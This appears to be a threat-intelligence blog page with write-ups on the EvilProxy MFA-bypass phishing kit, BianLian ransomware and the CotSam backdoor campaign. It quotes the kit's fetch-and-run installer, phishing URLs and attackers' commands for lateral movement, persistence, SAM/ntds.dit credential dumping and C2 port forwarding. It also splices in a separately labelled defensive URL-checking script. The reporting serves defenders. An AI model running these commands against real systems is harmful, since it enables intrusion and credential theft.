
Infostealer

Trojan

Malware


MetaStealer malware: An improved version of RedLine actively distributed via malspam campaign

MetaStealer, a newly emerged infostealer malware actively circulated via a malspam campaign to steal user credentials & cryptocurrency wallet details…

25-Apr-2022, 1 min read

Related Articles


Twilio

Phishing

EvilProxy

EvilProxy operators leverage Reverse Proxy & Cookie Injection methods to evade M...

Exploitation techniques continue to evolve, with sophisticated tools orchestrating advanced phishing attacks against targets across the globe in the wake of the recent Twilio breach, which resulted in the disclosure of 2FA (OTP) codes. A new Phishing-as-a-Service (PhaaS) offering dubbed EvilProxy has been identified by the threat researchers at Secure Blink, and it is being widely promoted on the Dark Web. Other sources use the alternate moniker Moloch, which has some ties to a phishing kit built by a number of renowned underground players that have previously attacked financial institutions and the e-commerce industry.

While the Twilio hack is purely a supply chain compromise, the resulting cybersecurity concerns lead to attacks against downstream targets. The productized underground service EvilProxy allows threat actors to attack MFA-enabled customers at scale without compromising upstream services. EvilProxy actors employ Reverse Proxy and Cookie Injection to evade two-factor authentication, proxying the victim's session. Similar techniques were previously seen in the targeted operations of APT and cyberespionage groups; EvilProxy has now effectively productized them, demonstrating the growing relevance of assaults against online services and MFA authentication systems.

Secure Blink threat researchers gained extensive insight into EvilProxy, including its structure, modules, functionalities, and the network infrastructure used to perform malicious activity, as a consequence of the continuing investigation into attacks against many employees of Fortune 500 firms. Initial incidents of EvilProxy have been linked to attacks against Google and Microsoft customers with MFA enabled, either by SMS or Application Token.

The first mention of EvilProxy was discovered in early May 2022, when the actors operating it released a demonstration video describing how it could be used to deliver advanced phishing links to compromise consumer accounts belonging to major brands including Apple, Facebook, GoDaddy, GitHub, Google, Dropbox, Instagram, Microsoft, Twitter, Yahoo, Yandex, and others.

Notably, EvilProxy also allows phishing attacks against the Python Package Index (PyPI). The official Python software repository recently announced (last week) that project contributors were the target of a phishing assault designed to obtain their login information. The assault used JuiceStealer as the final payload after the initial breach and, according to the findings of Secure Blink's threat researchers, was associated with EvilProxy operators, who introduced this capability just before the attack was carried out. In addition to PyPI, EvilProxy's capabilities now support GitHub and npmjs (a JavaScript package manager used by over 11 million developers globally), enabling supply chain assaults through sophisticated phishing operations. It is quite probable that the actors want to target software developers and IT engineers in order to gain access to their repositories and then compromise "downstream" targets. These tactics let attackers exploit the trust of end users, who believe they are obtaining software packages from safe locations and are unaware that those locations have been infiltrated.

## Core Functionality

A key feature of EvilProxy is its implementation of the _"Reverse Proxy"_ technique. The premise of the reverse proxy is straightforward: malicious actors lure victims to a phishing website and use the reverse proxy to fetch all the legitimate content the user expects, including login pages, while sniffing their traffic as it travels through the proxy. In this way they can collect valid session cookies and skip the need for usernames, passwords, and/or 2FA tokens.

Secure Blink has obtained videos released by EvilProxy actors illustrating how it can be used to hijack the victim's session and gain access to the target account through Microsoft 2FA and Google email.

[Figures: Google 2FA; Microsoft Company 2FA]

EvilProxy is supplied on a subscription basis: when the end user (a cybercriminal) selects a service of interest to target (e.g., Facebook or LinkedIn), the activation is for a certain time period (10, 20, or 31 days, as per the plan descriptions published by the actors on multiple Dark Web forums). John Malkovich, one of the principal actors, serves as an administrator who verifies new clients. All major underground communities, including XSS, Exploit, and Breached, are covered by the service. EvilProxy's payments are managed by a human operator on Telegram. After payment has been accepted, the subscription is credited to the user's account in the TOR-hosted customer portal. The kit is accessible on the Dark Web, hosted on the TOR network, for $400 per month. Several tutorials and interactive videos on how to use the service, along with configuration suggestions, are available on the EvilProxy website. Regarding the service's usability and the configurability of new campaigns, traffic flows, and data collection, the bad actors performed well.

After activation, the operator is prompted for SSH credentials to deploy a Docker container and scripts. This strategy has also been used by another PhaaS service found by Secure Blink this year, dubbed "Frappo." The automatic installation contains a reference to the GitLab user "Olf Dobs" (ksh8h297ydO):

```sh
apt update -qqy && apt dist-upgrade --no-install-recommends --no-install-suggests -o Dpkg::options::="--force-confdef" -y \
  && apt install --no-install-recommends --no-install-suggests -y git \
  && rm -rf /srv/control-agent && git clone --recurse-submodules https://gitlab.com/ksh8h297ayd0/docker-control-agent.git /srv/control-agent \
  && cd /srv/control-agent && chmod +x ./install.sh \
  && /srv/control-agent/install.sh '[license_key]'
```

Once the scripts have been successfully deployed, traffic originating from victims is routed via a pair of "upstream" gateways:

After doing more research, we were able to narrow down some of the phishing domains. The attackers register identically spelled domains so they may pass themselves off as respectable businesses. Here are a few examples of the fake Microsoft e-mail URLs that EvilProxy may create:

## Login Phishing URL

```
https://lmo.msdnmail[.]net/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2Fopenid%20profile%20https%3A%2F%2Fwwwofc.msdnmail.net%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=637975588496970710.Zjg3YzFkMmEtYTUxYy00NDliLWEzYzAtMTExZTliNjBkY2ZkY2U3NzM2MDMtZWNhZC00ZWFmLWE5YjMtYzgzZTFjM2E1ZDdl&ui_locales=en-US&mkt=en-US&state=jHi-CP0Nu4oFHIxklcT1adstnCWbwJwuXQWTxNSSsw-23qiXK-6EzyYoAyNZ6rHuHwsIYSkRp99F-bqPqhN4JVCnT4-3MQIDvdTKapKarcqaMFi6_xv2__3D0KfqBQ070ykGBGlwxFQ6Mzt9CwUsz2zdgcB4jFux2BhZQwcj-WumSBz0VQs5VePV-wz00E8rDxEXfQdlv-AT29EwdG77AmGWinyf3yQXSZTHJyo8s-IWSHoly3Kbturwnc87sDC3uwEn6VDIjKbbaJ-c-WOzrg&x-client-SKU=ID_NETSTANDARD2_0&x-client-ver=6.16.0.0
```

## Post-Authorization URL

```
https://473126b6-bf9a-4a96-8111-fb04f6631ad8-571c4b21.msdnmail[.]net/mail/?realm=[victim_domain]&exsvurl=1&ll-cc=1033&modurl=0&JitExp=1&url=%2Fowa%2F%3Frealm%253d%2526exsvurl%253d1%2526ll-cc%253d1033%2526modurl%253d0%2526login_hint%253[victim_email]%252540[victim_domain]
```

Those behind this use a wide variety of methods to identify potential victims and shield the phishing-kit code from being discovered. They collect information on VPN services, proxies, TOR exit nodes, and other hosts that may be used for IP reputation research on potential victims, similar to what fraud prevention and cyber threat intelligence (CTI) systems do. They either terminate the connection or send the user to a certain website (like "brave.com") if they think they are dealing with a bot or researcher. Fingerprinting is another method that has been discovered: the bad guys are very vigilant about identifying virtual machines, which are used by security analysts to investigate malicious content, and clients connecting through RDP (Remote Desktop Protocol).

## Connotation

Cybercriminals now have a low-cost, highly scalable option for conducting sophisticated phishing attacks against users of prominent online services with multi-factor authentication (MFA) enabled, although access to EvilProxy requires verification by its sellers. As more of these services surface on the Dark Web, we should expect a rise in ATO/BEC activity and other attacks that aim to steal users' identities, especially in environments where Multi-Factor Authentication (MFA) can be readily circumvented using software like EvilProxy.

## Indicators of Compromise

The following is a list of domains and URLs associated with the EvilProxy infrastructure compiled by Secure Blink's threat researchers. Post-incident communication with victims, including those from Fortune 500 firms and users of major online services, led to the mapping of some of these hosts. Despite the very fluid nature of bad actors' activities, information about these hosts may aid cybersecurity researchers and incident responders in detecting and attributing suspected malicious behavior to EvilProxy when investigating events involving MFA (2FA).
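The lookalike Microsoft OAuth URL quoted under "Login Phishing URL" is what a reverse-proxy kit hands the victim: a genuine-looking `/oauth2/v2.0/authorize` path and the real Office `client_id`, but served from and redirecting back to an attacker-registered domain. The Python below is an added triage example (not part of the Secure Blink write-up) that refangs such URLs, extracts the host, `client_id` and `redirect_uri`, and flags hosts outside an assumed allowlist of Microsoft identity domains; the allowlists and sample URLs are constructed assumptions.

```python
"""Added example (not from the Secure Blink write-up): triage OAuth-style
authorize URLs like the lookalike Microsoft login URL quoted above.
The allowlists and sample URLs are constructed assumptions."""
from urllib.parse import parse_qs, urlsplit

# Assumption: hosts that legitimately serve the Microsoft OAuth2 /authorize
# endpoint for a typical tenant; extend with federated IdPs where needed.
LEGIT_AUTHORIZE_HOSTS = {"login.microsoftonline.com", "login.live.com",
                         "login.microsoft.com"}
# Assumption: registrable domains a genuine redirect_uri should fall under.
LEGIT_DOMAINS = ("microsoft.com", "microsoftonline.com", "office.com",
                 "office365.com", "live.com")
# Brand tokens that, in a host outside LEGIT_DOMAINS, suggest a lookalike
# such as msdnmail.net.
BRAND_TOKENS = ("microsoft", "msdn", "office", "live", "outlook")


def refang(url: str) -> str:
    """Undo the [.] / hxxp defanging used in threat reports."""
    return url.replace("[.]", ".").replace("hxxp", "http")


def under(host: str, domains) -> bool:
    """True when host equals or is a subdomain of one of domains."""
    return any(host == d or host.endswith("." + d) for d in domains)


def analyze_authorize_url(url: str) -> dict:
    """Return structured findings for one authorize URL."""
    parts = urlsplit(refang(url))
    host = (parts.hostname or "").lower()
    query = parse_qs(parts.query)          # parse_qs percent-decodes values
    client_id = query.get("client_id", [""])[0]
    redirect = query.get("redirect_uri", [""])[0]
    redirect_host = (urlsplit(redirect).hostname or "").lower()
    findings = []
    if "/oauth2/" in parts.path and parts.path.endswith("/authorize") \
            and host not in LEGIT_AUTHORIZE_HOSTS:
        findings.append(f"authorize endpoint served by non-Microsoft host {host}")
    if any(t in host for t in BRAND_TOKENS) and not under(host, LEGIT_DOMAINS):
        findings.append(f"brand lookalike host {host}")
    if redirect_host and not under(redirect_host, LEGIT_DOMAINS):
        findings.append(f"redirect_uri leaves Microsoft domains: {redirect_host}")
    # A reverse proxy relays the real client_id unchanged, so a genuine app id
    # on a strange host is a signal of proxying, not reassurance.
    return {"host": host, "client_id": client_id, "redirect_host": redirect_host,
            "findings": findings, "suspicious": bool(findings)}


# Constructed samples modelled on the URL pattern quoted in the write-up
# (the client_id is the one that appears in that URL).
SAMPLE_URLS = [
    "https://lmo.msdnmail[.]net/common/oauth2/v2.0/authorize"
    "?client_id=4765445b-32c6-49b0-83e6-1d93765276ca"
    "&redirect_uri=https%3A%2F%2Fwwwofc.msdnmail.net%2Fv2%2FOfficeHome"
    "&response_mode=form_post",
    "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
    "?client_id=4765445b-32c6-49b0-83e6-1d93765276ca"
    "&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2"
    "&response_mode=form_post",
]


def scan(urls):
    """Analyze a batch of URLs (e.g. from proxy logs or e-mail link extraction)."""
    return [analyze_authorize_url(u) for u in urls]


if __name__ == "__main__":
    for r in scan(SAMPLE_URLS):
        tag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{tag:10} {r['host']} client_id={r['client_id']}")
        for f in r["findings"]:
            print("   -", f)
```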

21-Sep-2022, 1 min read

Golang

BianLian

Ransomware

Increases in the command and control infrastructure of the new cross-platform ra...

Secure Blink threat researchers have observed that Golang-based malware has grown in prominence, most likely due to its cross-platform functionality and the fact that it makes reverse engineering more complex. Threats developed using the Go language include ransomware, RATs, stealers, and more. The ransomware has targeted many well-known organizations (9 victims so far) across several industry sectors such as Manufacturing, Education, Healthcare, BFSI, etc. across Australia, North America, and the United Kingdom, primarily targeting SonicWall VPN devices and the Microsoft Exchange Server ProxyShell vulnerability chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).

## Attack Flow

The ransomware group first exploits the ProxyShell flaws to obtain access and then installs a web shell or ngrok payload to monitor the victim's activity. According to analysts, the gang has taken precautions to avoid detection and minimize observable events as it searches for data and selects machines to encrypt. According to the report, BianLian deployed typical _"living off the land"_ (LoL) techniques for network profiling and lateral movement. These included net.exe for adding and/or modifying user rights, netsh.exe for configuring host firewall policies, and reg.exe for modifying remote desktop and security policy enforcement registry settings. In addition to utilizing LoL techniques, the group is also known to deploy a bespoke implant as an additional method for sustaining persistent network access. This _"simple but effective"_ backdoor's primary purpose is to retrieve arbitrary payloads from a remote server, load them into memory, and then execute them. According to the assessment, BianLian has demonstrated proficiency with lateral movement techniques, altering its operations based on the network's capabilities and defenses.

BianLian, like other new cross-platform ransomware such as Agenda, Monster, and RedAlert, is capable of starting servers in Windows Safe Mode to execute its file-encrypting payload while evading detection by installed security solutions. Additional steps taken to evade security obstacles include deleting snapshots, removing backups, and running its Golang encryption module via Windows Remote Management (WinRM) and PowerShell scripts. The group's emergence adds to the expanding number of threats using Golang as a base language, which lets adversaries make rapid modifications to a single code base that can then be compiled for various platforms. In the figure below, we have prepared a breakdown of the industries targeted by the BianLian ransomware.

![Fig 1 Top Industries Targeted By BianLian.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Fig_1_Top_Industries_Targeted_By_Bian_Lian_0ff434142a.jpg)

***Figure 1 – Industries Targeted by the BianLian Ransomware***

## Technical Analysis

For this evaluation, we used the 64-bit Golang binary executable with SHA256 hash `eaf5e26c5e73f3db82cd07ea45e4d244ccb3ec3397ab5263a1a74add7bbcb6e2`. Below is the unique build ID of the Golang ransomware.

![Figure-2-Go-Build-ID.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_2_Go_Build_ID_59c0dc90f7.jpg)

***Figure 2 – Go Build Identifier***

When the ransomware is executed, it looks up the wine_get_version() function using the GetProcAddress() API to determine whether it is running in a WINE environment.

![Figure-3-Anti-analysis-Technique.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_3_Anti_analysis_Technique_2a561317e6.jpg)

***Figure 3 – Anti-analysis Technique***

After that, the ransomware uses the CreateThread() API call to create numerous threads in order to encrypt files more quickly, which also makes the malware more challenging to reverse engineer. The figure below depicts the many threads created by the ransomware.

![Figure-4-Multiple-Thread-Creation.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_4_Multiple_Thread_Creation_e229ce428e.jpg)

***Figure 4 - Creation of Multiple Threads***

Using the GetDriveTypeW() API function, the malware then identifies the system drives (from A: to Z:) and encrypts all files available on the associated devices. The malware then drops a ransom note with the filename "Look at these instructions.txt" in various folders. The ransomware generates a notice with the following content.

![Figure-5-Malware-Writing-Ransom-Notes(1).jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_5_Malware_Writing_Ransom_Notes_1_c0696f0499.jpg)

***Figure 5 - Depicts malware composing ransom notes***

After dropping the ransom message, the malware enumerates files and directories using the FindFirstFileW() and FindNextFileW() API calls to search for files to encrypt. The following file extensions and file/folder names are exempt from encryption by the ransomware:

For encryption on the victim's machine, the ransomware uses Golang packages including crypto/cipher, crypto/aes, and crypto/rsa.

![Figure-6-Hardcoded-Strings-of-Crypto-GoLang-Packages.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_6_Hardcoded_Strings_of_Crypto_Go_Lang_Packages_d010aaa382.jpg)

***Figure 6- Hardcoded "Crypto" Strings in GoLang Packages***

The malware splits each file's contents into 10-byte chunks for encryption. It first reads 10 bytes from the source file, encrypts them, and then writes the encrypted data to the destination file. Slicing the data into small pieces can help avoid detection by anti-virus software. The image below depicts the code fragment of the encryption loop as well as the original and encrypted file contents before and after encryption.

![Figure-7-Encryption-routine-and-OriginalEncrypted-file-content(1).jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_7_Encryption_routine_and_Original_Encrypted_file_content_1_1f64c44f2e.jpg)

***Figure 7 – Encryption algorithm and original/encrypted file content***

As demonstrated below, the malware then renames the encrypted files with the ".bianlian" extension and replaces the original file using the MoveFileExW() API.

![Figure-8-MoveFileExW-API.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_8_Move_File_Ex_W_API_ad5aeb0ba6.jpg)

***Figure 8 - MoveFileExW() API***

Using the following command line, the ransomware deletes itself, leaving just the encrypted files and the ransom notice on the victim's computer:

`cmd /c del C:\Users\Admin\Desktop\new one.exe`

The image below depicts the BianLian ransomware encrypted files and ransom note text file after a victim's computer has been successfully infected.

![Figure-9-Files-encrypted-by-BianLian-Ransomware.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_9_Files_encrypted_by_Bian_Lian_Ransomware_1902703a73.jpg)

***Figure 9 - BianLian ransomware-encrypted files***

In the ransom note, victims are instructed on how to contact the threat actors in order to get their encrypted files restored. The threat actors claim that their victims' sensitive information, including financial, client, company, technical, and personal files, has been downloaded, and threaten to publish it on their leak site if the ransom is not paid within ten days. The ransom message also includes the TOX Messenger ID for ransom negotiations as well as the Onion URL of the leak site page, as depicted in the figure below.

![Figure-10-Ransom-note.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_10_Ransom_note_c41d6ad983.jpg)

***Figure 10 – Ransom note***

The image below depicts the BianLian ransomware Onion leak site homepage and the extortion entries for the affected companies.

![Figure-11-BianLian-Leak-site-home-page.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_11_Bian_Lian_Leak_site_home_page_e500fded0f.jpg)

***Figure 11 -The homepage of the BianLian Leak website is depicted***

The BianLian leak website lists all firms hit by the ransomware and the threat actors' contact information for data recovery.

![Figure-12-BianLian-Leak-site-affected-companies-list-TAs-contact-details.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_12_Bian_Lian_Leak_site_affected_companies_list_T_As_contact_details_95d66ee6b9.jpg)

***Figure 12 - List of BianLian Leak site affected companies and contact information for threat actors***

## Conclusion

Organizational efficiency and security are two areas being negatively impacted by the rise of ransomware as an attack vector. BianLian is a Golang-based malware that has infiltrated several businesses and is demanding astronomical sums in return for decryption keys. The threat actors use a double extortion strategy, taking data from the victimized company and then publishing it online if the ransom is not paid in a timely fashion. Threat actors choose to create their ransomware in Golang for several reasons, chiefly because it allows a single codebase to be compiled for all major operating systems. The threat actors in charge of BianLian are constantly adapting and expanding their toolset so as to remain undetected. Secure Blink will keep an eye out for BianLian and similar ransomware gangs and evaluate their actions to learn more about their goals.

16-Sep-2022, 1 min read

APT

Backdoor

TA428

CotSam: a never seen before malware strain involved in the targeted attacks acro...

In the course of our threat research, we have discovered a new backdoor that differs from every other one used in attacks that researchers have linked to TA428. We chose to call the malware Backdoor.Win32.CotSam because of its resemblance to the Cotx backdoor. The attackers employed two techniques for deploying the malware while building the attack. In the first instance, the malware was delivered along with a vulnerable version of Microsoft Word: for 32-bit computers, Microsoft Word 2007 was used, and for 64-bit platforms, Microsoft Word 2010. After WINWORD.EXE was launched, a DLL hijacking vulnerability was used to transfer control to the malicious library wwlib.dll, which used a straightforward XOR operation with the key 0xAA to decrypt the file OEMPRINT.CAT from the current directory.

![TR1.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_1_e97461df8e.jpg)

The decrypted executable is then written directly into the memory of the svchost.exe process using the WriteProcessMemory method. In the second instance, the attackers took advantage of a DLL hijacking vulnerability in the applaunch.exe program (`MD5: 170D73BE3FE846E9070CFAE530F5A31C`). It's important to note that other Chinese groups had previously distributed ShadowPad malware using the identical version of applaunch.exe. The backdoor extracts the proxy server's parameters from the registry value `HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer`, then connects to the CnC server and waits for commands.

### LATERAL MOVEMENT

After taking control of the initial system, the attackers attempt to distribute the malware to further computers connected to the corporate network. The attackers' goal at this stage is to gain access to the domain controller and take complete control of the infrastructure of the company being attacked. Attackers use a remote shell supplied by the backdoor malware to launch their tools and retrieve operation results.

In the course of our investigation, we discovered a number of hand-entered commands that the attackers used on infected systems (this is indicated both by the time intervals between commands and by the output not being redirected anywhere except standard output). The majority of the attacks were performed using the NBTscan console tool, which was downloaded to victims' PCs as a .cab archive called ace.cab and unpacked using the expand system tool:

```
expand.exe ace.cab ace.exe
ace -n 172.22.0.0/16
```

We also saw the use of the Ladon hacking framework in a few instances. The framework is made up of a variety of modules with various lateral movement functionality, such as:

- Scanning the network and finding different types of devices.
- Identifying and exploiting vulnerabilities in the devices found.
- Cracking passwords for resources on the network.
- Scanning for password hashes.
- Scanning for passwords in text files.
- Remotely executing arbitrary code.

![TR2.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_2_6ec25456fe.jpg)

With these tools, attackers are able to scan the whole network architecture and discover the systems most exposed to attack. Additionally, the attackers gathered data about system users and their network connections. They were particularly interested in RDP connections:

```
query user
net user
net group
ipconfig /all
netstat -no
netstat -no | findstr 3389
netstat -ano | findstr 2589
```

### Distribution of Malware

Using the results of network scanning and the user credentials they had already obtained, the attackers spread their infection from one system to the next. They used the net use and xcopy programs to connect to remote systems and install malware on them:

```
net use \\[IP address]\IPC$ "[password]" /u:"[user name]"
xcopy.exe /s \\[IP address]\c$\windows\web\*" $windir\Web\ /y /e /i /q
```

An open-source VBS script called wmic.vbs was occasionally used to deliver malware; the attackers also downloaded it to remote systems:

`cscript.exe //nologo wmic.vbs /cmd [IP address] [user name][password] $appdata\ABBYY\Install.exe`

Although the VBS script was initially created as a penetration testing tool, threat actors frequently employ it in actual attacks. The script wmic.vbs executes commands for a user account with administrative rights using WMIC (Windows Management Instrumentation Command-line). In other instances, the attackers used Windows Task Scheduler to create a task ensuring that the malware launched automatically:

`schtasks /create /tn CacheTasks /tr “$appdata\ABBYY\FineReader\WINWORD.EXE” /sc minute /mo 50 /ru “” /f`

Where the attackers were able to reach closed networks (networks not directly connected to the internet), they turned intermediate systems (systems accessible from the closed network while also being connected to the internet) into proxy servers. This made it possible for malware running on computers in closed networks to communicate with its CnC servers. In this scenario, configuring network traffic redirection was a simple process that could be completed with built-in Windows tools:

`netsh interface portproxy add v4tov4 2589 <IP address> 443`

### Domain Hijacking

After taking control of the domain controller, the attackers took the whole database of Active Directory user password hashes. To do this, they first used the following cmd commands to store a copy of the system registry hives:

```
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
```

Following that, they copied the ntds.dit file, which houses the Active Directory database and user password hashes. Notably, the system keeps the file ntds.dit open at all times, which prevents ordinary copying tools from working on it. The attackers circumvented this restriction by employing a specific tool made to copy the file via the Windows Volume Shadow Copy Service (VSS).

![TR3.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_3_2456e3d8ab.jpg)

An example of a command launching the utility is shown below:

`c:\programdata\microsoft\sc64.exe c:\windows\ntds\ntds.dit c:\programdata\microsoft\ntds.dit`

Using the system registry's contents and the file ntds.dit, the attackers acquired logins and password hashes for every user in the domain. The attackers then used hash cracking to obtain the login credentials for the majority of users in the attacked company's domain. Where an attacked organization's IT architecture had many domains, the attackers examined trust relationships between the domains to locate accounts that allowed them to move laterally:

`nltest /domain_trusts`

Having gained access to a domain controller, the attackers also obtained, among other things, the password hash for the user krbtgt (an Active Directory service account), allowing them to launch the Golden Ticket attack. For an unlimited period of time, it permitted them to independently issue Kerberos tickets (TGT) and authenticate to any Active Directory service. In one of the cases, the security team of the attacked firm examined unusual activity on the domain controller and, as a result, changed the passwords of users whose accounts had been compromised. However, the attackers continued to use Kerberos tickets to act without hindrance on behalf of these accounts. This demonstrates that traditional incident response techniques are ineffective in the event of a Golden Ticket attack.

Last but not least, it's important to remember that in one of the incidents, the attackers were also successful in gaining access to the server hosting the system that manages security solutions and remotely changing the settings of the endpoint security products the company was using.

Our findings from this [threat research](https://www.secureblink.com/threat-research) demonstrate that spear phishing is still one of the most important risks to commercial companies and government institutions. The majority of the malware employed by the attackers is known backdoor software, used along with common lateral movement strategies and antivirus evasion techniques. They were able to access dozens of businesses simultaneously and even take over the complete IT infrastructure, including IT security measures, of some of the targeted firms. The series of attacks we have identified is not the first in the campaign, and given the attackers' level of success, we think it is quite probable that they will carry out further attacks along these lines in the future. Public and private organizations should implement comprehensive measures to deter such attacks across cyberspace.

09-Aug-2022, 1 min read